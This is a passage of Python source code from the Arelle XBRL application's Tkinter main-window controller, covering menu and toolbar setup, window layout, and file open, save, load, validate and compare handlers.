validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarSaveFile.gif", self.fileSave, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton")
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 1)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def okayToContinue(self):
if not self.dirty:
return True
reply = tkinter.messagebox.askyesnocancel(
_("arelle - Unsaved Changes"),
_("Save unsaved changes?"),
parent=self.parent)
if reply is None:
return False
if reply:
return self.fileSave()
return True
def fileSave(self, view=None, fileType=None, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
modelXbrl = view.modelXbrl
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html":
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml":
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Infoset"),
initialdir=initialdir,
filetypes=[(_("XML file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".csv")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.EFM)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"))
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of tests"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
currentAction = "dimensions relationships view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=lambda: self.backgroundValidate())
thread.daemon = True
thread.start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
thread.daemon = True
thread.start()
